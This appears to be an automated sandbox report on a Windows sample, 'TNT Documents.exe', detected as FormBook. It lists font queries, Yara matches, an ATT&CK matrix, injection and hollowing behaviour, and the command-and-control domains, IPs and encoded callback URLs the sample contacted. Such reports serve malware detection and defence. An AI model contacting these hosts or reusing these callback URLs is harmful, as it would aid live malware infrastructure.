          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobTimestomp1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 532859 Sample: TNT Documents.exe Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 33 www.viavelleiloes.online 2->33 35 www.projectcentered.com 2->35 37 5 other IPs or domains 2->37 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 11 other signatures 2->51 11 TNT Documents.exe 3 2->11         started        signatures3 process4 file5 31 C:\Users\user\...\TNT Documents.exe.log, ASCII 11->31 dropped 63 Injects a PE file into a foreign processes 11->63 15 TNT Documents.exe 11->15         started        18 TNT Documents.exe 11->18         started        signatures6 process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 Queues an APC in another process (thread injection) 15->71 20 explorer.exe 15->20 injected process9 dnsIp10 39 metronixmedical.com 119.18.54.99, 49820, 80 PUBLIC-DOMAIN-REGISTRYUS India 20->39 41 cortepuroiberico.com 51.255.30.106, 49794, 80 OVHFR France 20->41 43 5 other IPs or domains 20->43 53 System process connects to network (likely due to code injection or exploit) 20->53 24 mstsc.exe 20->24         started        signatures11 process12 signatures13 55 Self deletion via cmd delete 24->55 57 Modifies the context of a thread in another process (thread injection) 24->57 59 Maps a DLL or memory area into another process 24->59 61 Tries to detect virtualization through RDTSC time measurements 24->61 27 cmd.exe 1 24->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          TNT Documents.exe47%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          TNT Documents.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.TNT Documents.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.0.TNT Documents.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.0.TNT Documents.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.0.TNT Documents.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          coached.info0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.fontbureau.comI.TTF0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.sajatypeworks.comus40%Avira URL Cloudsafe
          http://www.coached.info/how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd0%Avira URL Cloudsafe
          http://www.founder.com.cn/cnar0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn90%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/soft0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.founder.c0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.founder.com.cn/cnG0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          www.floridanratraining.com/how6/0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.comx0%Avira URL Cloudsafe
          http://www.metronixmedical.com/how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/slnt0%Avira URL Cloudsafe
          http://www.urwpp.de20%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
          http://www.fontbureau.comF(0%Avira URL Cloudsafe
          http://www.founder.com.cn/cna0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/(0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sajatypeworks.coma0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.founder.com.cn/cnaX0%Avira URL Cloudsafe
          http://www.urwpp.de0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.fontbureau.com=0%Avira URL Cloudsafe
          http://www.fontbureau.comcomo?0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/M0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/F0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.fontbureau.comd0%URL Reputationsafe
          http://www.fonts.comX0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.monotype.0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/.comp0%Avira URL Cloudsafe
          http://www.tiro.comU0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.specialtyplastics.online/how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd100%Avira URL Cloudmalware
          http://www.urwpp.der0%Avira URL Cloudsafe
          http://www.fontbureau.como0%URL Reputationsafe
          http://www.zhongyicts.com.cno.0%URL Reputationsafe
          http://www.fontbureau.comals0%URL Reputationsafe
          http://www.tiro.comic0%URL Reputationsafe
          http://www.fontbureau.comitud0%URL Reputationsafe
          http://www.cortepuroiberico.com/how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          metronixmedical.com
          		119.18.54.99
          		truetrue
            		unknown
            www.functionalsoft.com
            		74.208.236.210
            		truefalse
              		unknown
              coached.info
              		34.102.136.180
              		truefalseunknown
              cortepuroiberico.com
              		51.255.30.106
              		truetrue
                		unknown
                www.specialtyplastics.online
                		209.17.116.163
                		truetrue
                  		unknown
                  projectcentered.com
                  		158.69.116.156
                  		truetrue
                    		unknown
                    www.pirosconsulting.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.metronixmedical.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.pentagonpublishers.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.floridanratraining.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.viavelleiloes.online
                            		unknown
                            		unknowntrue
                              		unknown
                              www.cortepuroiberico.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.coached.info
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.projectcentered.com
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.coached.info/how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRdfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    www.floridanratraining.com/how6/true
                                    • Avira URL Cloud: safe
                                    		low
                                    http://www.metronixmedical.com/how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRdtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.specialtyplastics.online/how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRdtrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.cortepuroiberico.com/how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRdtrue
                                    • Avira URL Cloud: malware
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
